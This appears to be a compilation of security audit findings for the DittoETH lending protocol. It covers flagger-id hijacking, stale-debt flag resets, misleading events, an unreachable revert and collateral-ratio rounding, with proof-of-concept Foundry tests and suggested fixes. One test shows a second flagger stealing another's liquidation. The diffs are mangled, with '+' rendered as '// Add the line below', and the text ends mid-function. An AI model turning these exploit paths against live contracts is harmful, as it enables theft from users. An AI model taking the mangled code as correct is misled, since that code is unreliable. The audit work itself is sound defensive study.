The `setFlagger` function allows a new flagger to reuse `flaggerHint` flag id after `LibAsset.firstLiquidationTime` has passed after flagId has been updated.\\n```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L377-L404C13\\nSince the previous flagger can only liquidate the flagged short after `LibAsset.firstLiquidationTime` has passed, the flagged short will be unliquidated till that time. Both the ability to flag the short for first flagger and the ability to replace the first flagger starts at the same instant. This allows a new flagger to take control over the liquidation of the flagged short by finding some other liquidatable short and passing in the flagId of the previous flagger as the `flagHint`.\\nPOC Test\\n```\\ndiff --git a/test/MarginCallFlagShort.t.sol b/test/MarginCallFlagShort.t.sol\\nindex 906657e..3d7f985 100644\\n--- a/test/MarginCallFlagShort.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/MarginCallFlagShort.t.sol\\n@@ -169,6 // Add the line below\\n169,90 @@ contract MarginCallFlagShortTest is MarginCallHelper {\\n assertEq(diamond.getFlagger(shortRecord.flaggerId), extra);\\n }\\n \\n// Add the line below\\n function test_FlaggerId_Override_Before_Call() public {\\n// Add the line below\\n address flagger1 = address(77);\\n// Add the line below\\n address flagger2 = address(78);\\n// Add the line below\\n\\n// Add the line below\\n vm.label(flagger1, "flagger1");\\n// Add the line below\\n vm.label(flagger2, "flagger2");\\n// Add the line below\\n\\n// Add the line below\\n //create first short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord1 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 1);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag first short\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n diamond.flagShort(asset, sender, shortRecord1.id, Constants.HEAD);\\n// Add the line below\\n shortRecord1 = diamond.getShortRecord(asset, sender, shortRecord1.id);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord1.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger1);\\n// Add the line below\\n\\n// Add the line below\\n skip(TEN_HRS_PLUS);\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n\\n// Add the line below\\n //attempting direct liquidation by flagger2 fails since only allowed to flagger1\\n// Add the line below\\n\\n// Add the line below\\n //add ask order to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n uint16[] memory shortHintArray = setShortHintArray();\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //cancel the previously created ask order\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //reset\\n// Add the line below\\n setETH(4000 ether);\\n// Add the line below\\n\\n// Add the line below\\n //create another short\\n// Add the line below\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n STypes.ShortRecord memory shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 0);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), address(0));\\n// Add the line below\\n\\n// Add the line below\\n //flag second short by providing flagger id of flagger1. this resets the flagger id\\n// Add the line below\\n setETH(2500 ether);\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.flagShort(\\n// Add the line below\\n asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1, uint16(shortRecord1.flaggerId)\\n// Add the line below\\n );\\n// Add the line below\\n shortRecord2 =\\n// Add the line below\\n diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID // Add the line below\\n 1);\\n// Add the line below\\n\\n// Add the line below\\n //flagger1 has been replaced\\n// Add the line below\\n assertEq(diamond.getFlaggerIdCounter(), 2);\\n// Add the line below\\n assertEq(shortRecord2.flaggerId, 1);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord2.flaggerId), flagger2);\\n// Add the line below\\n assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger2);\\n// Add the line below\\n\\n// Add the line below\\n //ask to liquidate against\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n //now flagger1 cannot liquidate shortRecord1\\n// Add the line below\\n vm.prank(flagger1);\\n// Add the line below\\n vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n\\n// Add the line below\\n //but flagger1 can\\n// Add the line below\\n vm.prank(flagger2);\\n// Add the line below\\n diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function test_FlagShort_FlaggerId_Recycling_AfterIncreaseCollateral() public {\\n createAndFlagShort();\\n \\n```\\n
Update the check to `secondLiquidationTime`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibShortRecord.sol b/contracts/libraries/LibShortRecord.sol\\nindex 7c5ecc3..c8736b0 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibShortRecord.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibShortRecord.sol\\n@@ // Remove the line below\\n391,7 // Add the line below\\n391,7 @@ library LibShortRecord {\\n // Remove the line below\\n s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re// Remove the line below\\nuse an inactive flaggerId\\n// Remove the line below\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n// Add the line below\\n if (timeDiff > LibAsset.secondLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n } else if (s.flaggerIdCounter < type(uint16).max) {\\n```\\n
First flagger will be in loss of the spent gas and expected reward.
```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n
Combining shorts can incorrectly reset the shorts flag
medium
The protocol allows users to combine multiple short positions into one as long as the combined short stays above the primary collateral ratio. The function is also able to reset an active flag from any of the combined shorts if the final ratio is above the primaryLiquidationCR.\\nThe issue is that the combineShorts function does not call updateErcDebt, which is called in every other function that is able to reset a shorts flag. This means that if the debt is outdated the final combined short could incorrectly reset the flag putting the position on a healthy ratio when it really isn't. This would also mean that it will have to be reflagged and go through the timer again before it can be liquidated.\\nThe combine shorts function merges all short records into the short at position id[0]. Focusing on the debt aspect it adds up the total debt and calculates the ercDebtSocialized of all positions except for the first.\\n```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n\\nIt then merges this total to the first position using the merge function and this will give us the combined short.\\n```\\n// Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n```\\n\\nFinally we check if the position had an active flag and if it did, we check if the new combined short is in a healthy enough state to reset the flag, if not the whole function reverts.\\n```\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n```\\n\\nAs you can see the updateErcDebt function is not called anywhere in the function meaning the flag could be reset with outdated values.
Call updateErcDebt on the short once it is combined in the combineShorts function to ensure the collateral ratio is calculated with the most up to date values.\\n```\\n function combineShorts(address asset, uint8[] memory ids)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, ids[0])\\n {\\n // Initial code\\n\\n // Merge all short records into the short at position id[0]\\n firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n\\n firstShort.updateErcDebt(asset); // update debt here before checking flag\\n\\n // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (c.shortFlagExists) {\\n if (\\n firstShort.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n firstShort.resetFlag();\\n }\\n emit Events.CombineShorts(asset, msg.sender, ids);\\n }\\n```\\n
A short could have its flag incorrectly reset and reset the timer. This is not good for the protocol as it will have a unhealthy short for a longer time.
```\\n {\\n uint88 currentShortCollateral = currentShort.collateral;\\n uint88 currentShortErcDebt = currentShort.ercDebt;\\n collateral += currentShortCollateral;\\n ercDebt += currentShortErcDebt;\\n yield += currentShortCollateral.mul(currentShort.zethYieldRate);\\n ercDebtSocialized += currentShortErcDebt.mul(currentShort.ercDebtRate);\\n }\\n```\\n
Event in secondaryLiquidation could be misused to show false liquidations
low
The `liquidateSecondary` function in the protocol is designed to emit events detailing the specifics of liquidation, which can be crucial for other protocols or front-end integrations that track secondary liquidations within the protocol. One of the values emitted is `batches`, which indicates which positions got liquidated. However the function emits the `batches` array as it initially receives it, even though it may skip positions that are not eligible for liquidation during its execution. This implies that the emitted event could represent incorrect data, indicating positions as liquidated even if they were not, due to their ineligibility.\\n```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n
Event in secondaryLiquidation could be misused to show false liquidations\\nModify the `batches` array before emitting it in the event, ensuring it accurately reflects the positions that were actually liquidated.
This inconsistency in the emitted event data can lead to incorrect data, indicating positions as liquidated even if they were not.
```\\nfunction liquidateSecondary(\\n address asset,\\n MTypes.BatchMC[] memory batches,\\n uint88 liquidateAmount,\\n bool isWallet\\n ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n // Initial code\\n\\n emit Events.LiquidateSecondary(asset, batches, msg.sender, isWallet);\\n }\\n```\\n
`Errors.InvalidTwapPrice()` is never invoked when `if (twapPriceInEther == 0)` is true
low
The protocol expects to `revert` with `Errors.InvalidTwapPrice()` when twapPriceInEther == 0:\\n```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n\\nHowever, the control never reaches Line 88 when `twapPriceInEther` is zero. It rather reverts before that with error `Division or modulo by 0`.\\nNOTE: Due to this bug, `Errors.InvalidTwapPrice()` is never invoked/thrown by the protocol even under satisfactory conditions, even though it has been defined.\\nSince I could not find any helper function inside `contracts/` or `test/` which lets one set the `twapPrice` returned by uint256 `twapPrice` = IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes); to zero for testing purposes, I have created a simplified PoC which targets the problem area:\\nSave the following as a file named `test/InvalidTwapPriceErrorCheck.t.sol` and run the test via `forge test --mt testInvalidTwapPriceErrNeverInvoked -vv`. You will find that the test reverts with error `Division or modulo by 0`, but not with `Errors.InvalidTwapPrice()`. The PoC uses the same underlying math libraries and logic path as the protocol does in `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()`.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Constants} from "contracts/libraries/Constants.sol";\\nimport {Errors} from "contracts/libraries/Errors.sol";\\nimport {U256} from "contracts/libraries/PRBMathHelper.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\n\\ncontract InvalidTwapPriceErrorCheck is OBFixture {\\n using U256 for uint256;\\n\\n function getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n // Following code is copied as-is from\\n // `contracts/libraries/LibOracle.sol::baseOracleCircuitBreaker()#L85-L89`\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n }\\n }\\n\\n function getZeroTwapPriceInEther_CorrectStyle()\\n internal\\n pure\\n returns (uint256 twapPriceInEther, uint256 twapPriceInv)\\n {\\n // fake the twapPrice to 0\\n uint256 twapPrice = 0; // IDiamond(payable(address(this))).estimateWETHInUSDC(Constants.UNISWAP_WETH_BASE_AMT, 30 minutes);\\n twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n if (twapPriceInEther == 0) { \\n revert Errors.InvalidTwapPrice();\\n }\\n twapPriceInv = twapPriceInEther.inv();\\n }\\n\\n function testInvalidTwapPriceErrNeverInvoked() public pure {\\n getZeroTwapPriceInEther_IncorrectStyle_As_In_Existing_DittoProtocol();\\n }\\n\\n function testInvalidTwapPriceErrInvokedCorrectly() public {\\n vm.expectRevert(Errors.InvalidTwapPrice.selector);\\n getZeroTwapPriceInEther_CorrectStyle();\\n }\\n}\\n```\\n\\n\\nIn the above test file, you can also run the test which invokes the "fixed" or "correct" code style via `forge test --mt testInvalidTwapPriceErrInvokedCorrectly -vv`. This will invoke the `Errors.InvalidTwapPrice` error, as expected.
The check on Line 87 (if condition) needs to be performed immediately after Line 85.\\n```\\n 85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n 86 if (twapPriceInEther == 0) {\\n// Add the line below\\n 87 revert Errors.InvalidTwapPrice();\\n// Add the line below\\n 88 }\\n// Add the line below\\n 89 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 86 uint256 twapPriceInv = twapPriceInEther.inv();\\n// Remove the line below\\n 87 if (twapPriceInEther == 0) {\\n// Remove the line below\\n 88 revert Errors.InvalidTwapPrice();\\n// Remove the line below\\n 89 }\\n```\\n\\nThe above fix needed to be done because the `inv()` call caused a revert even before control used to reach the `if` condition.
Protocol owner or developer monitoring for a revert due to `Errors.InvalidTwapPrice()` in the logs will never see it and will make debugging & issue resolution harder.
```\\nFile: contracts/libraries/LibOracle.sol\\n\\n85 uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n86 uint256 twapPriceInv = twapPriceInEther.inv();\\n87 if (twapPriceInEther == 0) {\\n88 revert Errors.InvalidTwapPrice(); // @audit : unreachable code\\n89 }\\n```\\n
Rounding-up of user's `cRatio` causes loss for the protocol
medium
At multiple places in the code, user's collateral ratio has been calculated in a manner which causes loss of precision (rounding-up) due to division before multiplication. This causes potential loss for the DittoETH protocol, among other problems.\\nRoot Cause\\nUse of the following piece of code causes rounding-up:\\nStyle 1\\n```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n\\nStyle 2\\n```\\nuint256 oraclePrice = LibOracle.getOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset); // or uint256 oraclePrice = LibOracle.getPrice(asset);\\n // rest of code\\n // rest of code\\n // rest of code\\nuint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n```\\n\\n\\nLet's break the issue down into 4 smaller parts:\\nPART 1:\\nLet us first look inside getOraclePrice():\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 20 function getOraclePrice(address asset) internal view returns (uint256) {\\n 21 AppStorage storage s = appStorage();\\n 22 AggregatorV3Interface baseOracle = AggregatorV3Interface(s.baseOracle);\\n 23 uint256 protocolPrice = getPrice(asset);\\n 24 // prettier-ignore\\n 25 (\\n 26 uint80 baseRoundID,\\n 27 int256 basePrice,\\n 28 /*uint256 baseStartedAt*/\\n 29 ,\\n 30 uint256 baseTimeStamp,\\n 31 /*uint80 baseAnsweredInRound*/\\n 32 ) = baseOracle.latestRoundData();\\n 33\\n 34 AggregatorV3Interface oracle = AggregatorV3Interface(s.asset[asset].oracle);\\n 35 if (address(oracle) == address(0)) revert Errors.InvalidAsset();\\n 36\\n 37 if (oracle == baseOracle) {\\n 38 //@dev multiply base oracle by 10**10 to give it 18 decimals of precision\\n 39 uint256 basePriceInEth = basePrice > 0\\n 40 ? uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()\\n 41 : 0;\\n 42 basePriceInEth = baseOracleCircuitBreaker(\\n 43 protocolPrice, baseRoundID, basePrice, baseTimeStamp, basePriceInEth\\n 44 );\\n 45 return basePriceInEth;\\n 46 } else {\\n 47 // prettier-ignore\\n 48 (\\n 49 uint80 roundID,\\n 50 int256 price,\\n 51 /*uint256 startedAt*/\\n 52 ,\\n 53 uint256 timeStamp,\\n 54 /*uint80 answeredInRound*/\\n 55 ) = oracle.latestRoundData();\\n 56 uint256 priceInEth = uint256(price).div(uint256(basePrice));\\n 57 oracleCircuitBreaker(\\n 58 roundID, baseRoundID, price, basePrice, timeStamp, baseTimeStamp\\n 59 );\\n 60 return priceInEth;\\n 61 }\\n 62 }\\n```\\n\\nBased on whether the `oracle` is `baseOracle` or not, the function returns either `basePriceEth` or `priceInEth`.\\n`basePriceEth` can be `uint256(basePrice * Constants.BASE_ORACLE_DECIMALS).inv()` which is basically `1e36 / (basePrice * Constants.BASE_ORACLE_DECIMALS)` or simply written, of the form `oracleN / oracleD` where `oracleN` is the numerator with value 1e36 (as defined here) and `oracleD` is the denominator.\\n`priceInEth` is given as uint256 `priceInEth` = uint256(price).div(uint256(basePrice)) which again is of the form `oracleN / oracleD`.\\n\\nPART 2:\\ngetSavedOrSpotOraclePrice() too internally calls the above `getOraclePrice()` function, if it has been equal to or more than 15 minutes since the last time `LibOrders.getOffsetTime()` was set:\\n```\\n File: contracts/libraries/LibOracle.sol\\n\\n 153 function getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n 154 if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n 155 return getPrice(asset);\\n 156 } else {\\n 157 return getOraclePrice(asset);\\n 158 }\\n 159 }\\n```\\n\\n\\nPART 3:\\ngetCollateralRatioSpotPrice() calculates `cRatio` as:\\n```\\n File: contracts/libraries/LibShortRecord.sol\\n\\n 30 function getCollateralRatioSpotPrice(\\n 31 STypes.ShortRecord memory short,\\n 32 uint256 oraclePrice\\n 33 ) internal pure returns (uint256 cRatio) {\\n 34 return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n 35 }\\n```\\n\\n\\nPART 4 (FINAL PART):\\nThere are multiple places in the code (mentioned below under Impacts section) which compare the user's `cRatio` to `initialCR` or `LibAsset.primaryLiquidationCR(_asset)` in the following manner:\\n```\\nif (short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset)) < LibAsset.primaryLiquidationCR(asset))\\n```\\n\\n\\nCalling `short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))` means the value returned from it would be:\\n```\\n // @audit-issue : Potential precision loss. Division before multiplication should not be done.\\n shortCollateral / (shortErcDebt * (oracleN / oracleD)) // return short.collateral.div(short.ercDebt.mul(oraclePrice));\\n```\\n\\nwhich has the potential for precision loss (rounding-up) due to division before multiplication. The correct style ought to be:\\n```\\n// Add the line below\\n (shortCollateral * oracleD) / (shortErcDebt * oracleN)\\n```\\n\\n\\nHave attempted to keep all values in close proximity to the ones present in forked mainnet tests.\\nLet's assume some values for numerator & denominator and other variables:\\n```\\n uint256 private short_collateral = 100361729669569000000; // ~ 100 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // oracleD\\n uint256 private primaryLiquidationCR = 2000000000000000000; // 2 ether (as on forked mainnet)\\n\\n// For this example, we assume that oracle != baseOracle, so that the below calculation would be done by the protocol\\nSo calculated priceInEth = price.div(basePrice) = 501808648347845 // ~ 0.0005 ether\\n```\\n\\n\\nLet's calculate for the scenario of `flagShort()` where the code logic says:\\n```\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true`, then revert, due to rounding-up and the short will incorrectly escape flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n```\\n\\n\\nCreate a file named `test/IncorrectCRatioCheck.t.sol` and paste the following code in it. Some mock functions are included here which mirror protocol's calculation style:\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {U256} from "contracts/libraries/PRBMathHelper.sol";\\nimport {OBFixture} from "test/utils/OBFixture.sol";\\nimport {console} from "contracts/libraries/console.sol";\\n\\ncontract IncorrectCRatioCheck is OBFixture {\\n using U256 for uint256;\\n\\n uint256 private short_collateral = 85307470219133700000; // ~ 85.3 ether\\n uint256 private short_ercDebt = 100000000000000000000000; // 100_000 ether\\n uint256 private price = 99995505; // oracleN\\n uint256 private basePrice = 199270190598; // (as on forked mainnet) // oracleD\\n uint256 private primaryLiquidationCR = 1700000000000000000; // 1.7 ether (as on forked mainnet)\\n\\n function _getSavedOrSpotOraclePrice() internal view returns (uint256) {\\n uint256 priceInEth = price.div(basePrice);\\n return priceInEth; // will return 501808648347845 =~ 0.0005 ether // (as on forked mainnet)\\n }\\n\\n function getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n uint256 oraclePrice\\n ) internal view returns (uint256) {\\n return short_collateral.div(short_ercDebt.mul(oraclePrice));\\n }\\n\\n function getCollateralRatioSpotPrice_CorrectStyle(uint256 oracleN, uint256 oracleD)\\n internal\\n view\\n returns (uint256)\\n {\\n return (short_collateral.mul(oracleD)).div(short_ercDebt.mul(oracleN));\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n ) public view {\\n uint256 cRatio =\\n getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n _getSavedOrSpotOraclePrice()\\n );\\n console.log("cRatio calculated (existing style) =", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log("Errors.SufficientCollateral; can not be flagged");\\n } else {\\n console.log("InsufficientCollateral; can be flagged");\\n }\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_CorrectStyle() public view {\\n uint256 cRatio = getCollateralRatioSpotPrice_CorrectStyle(price, basePrice);\\n console.log("cRatio calculated (correct style) =", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log("Errors.SufficientCollateral; can not be flagged");\\n } else {\\n console.log("InsufficientCollateral; can be flagged");\\n }\\n }\\n}\\n```\\n\\n\\nFirst, let's see the output as per protocol's calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol -vv:\\n```\\nLogs:\\n cRatio calculated (existing style) = 1700000000000000996\\n Errors.SufficientCollateral; can not be flagged\\n```\\n\\nSo the short can not be flagged as `cRatio > primaryLiquidationCR` of 1700000000000000000.\\nNow, let's see the output as per the correct calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_CorrectStyle -vv:\\n```\\nLogs:\\n cRatio calculated (correct style) = 1699999999999899995\\n InsufficientCollateral; can be flagged\\n```\\n\\nShort's cRatio is actually below primaryLiquidationCR. Should have been flagged ideally.\\n
These steps need to be taken to fix the issue. Developer may have to make some additional changes since `.mul`, `.div`, etc are being used from the `PRBMathHelper.sol` library. Following is the general workflow required:\\nCreate additional functions to fetch oracle parameters instead of price: Create copies of `getOraclePrice()` and `getSavedOrSpotOraclePrice()`, but these ones return `oracleN` & `oracleD` instead of the calculated price. Let's assume the new names to be `getOraclePriceParams()` and `getSavedOrSpotOraclePriceParams()`.\\nCreate a new function to calculate cRatio which will be used in place of the above occurences of getCollateralRatioSpotPrice():\\n```\\n function getCollateralRatioSpotPriceFromOracleParams(\\n STypes.ShortRecord memory short,\\n uint256 oracleN,\\n uint256 oracleD\\n ) internal pure returns (uint256 cRatio) {\\n return (short.collateral.mul(oracleD)).div(short.ercDebt.mul(oracleN));\\n }\\n```\\n\\n\\nFor fixing the last issue of `oraclePrice.mul(1.01 ether)` on L847, first call `getOraclePriceParams()` to get `oracleN` & `oracleD` and then:\\n```\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n// Remove the line below\\n 847 <= oraclePrice.mul(1.01 ether)\\n// Add the line below\\n 847 <= (oracleN.mul(1.01 ether)).div(oracleD)\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n```\\n
```\\n File: contracts/facets/YieldFacet.sol\\n\\n 76 function _distributeYield(address asset)\\n 77 private\\n 78 onlyValidAsset(asset)\\n 79 returns (uint88 yield, uint256 dittoYieldShares)\\n 80 {\\n 81 uint256 vault = s.asset[asset].vault;\\n 82 // Last updated zethYieldRate for this vault\\n 83 uint80 zethYieldRate = s.vault[vault].zethYieldRate;\\n 84 // Protocol time\\n 85 uint256 timestamp = LibOrders.getOffsetTimeHours();\\n 86 // Last saved oracle price\\n 87 uint256 oraclePrice = LibOracle.getPrice(asset);\\n 88 // CR of shortRecord collateralized at initialMargin for this asset\\n 89 uint256 initialCR = LibAsset.initialMargin(asset) + 1 ether;\\n 90 // Retrieve first non-HEAD short\\n 91 uint8 id = s.shortRecords[asset][msg.sender][Constants.HEAD].nextId;\\n 92 // Loop through all shorter's shorts of this asset\\n 93 while (true) {\\n 94 // One short of one shorter in this market\\n 95 STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n 96 // To prevent flash loans or loans where they want to deposit to claim yield immediately\\n 97 bool isNotRecentlyModified =\\n 98 timestamp - short.updatedAt > Constants.YIELD_DELAY_HOURS;\\n 99 // Check for cancelled short\\n 100 if (short.status != SR.Cancelled && isNotRecentlyModified) {\\n 101 uint88 shortYield =\\n 102 short.collateral.mulU88(zethYieldRate - short.zethYieldRate);\\n 103 // Yield earned by this short\\n 104 yield += shortYield;\\n 105 // Update zethYieldRate for this short\\n 106 short.zethYieldRate = zethYieldRate;\\n 107 // Calculate CR to modify ditto rewards\\n 108 uint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n 109 if (cRatio <= initialCR) {\\n 110 dittoYieldShares += shortYield;\\n 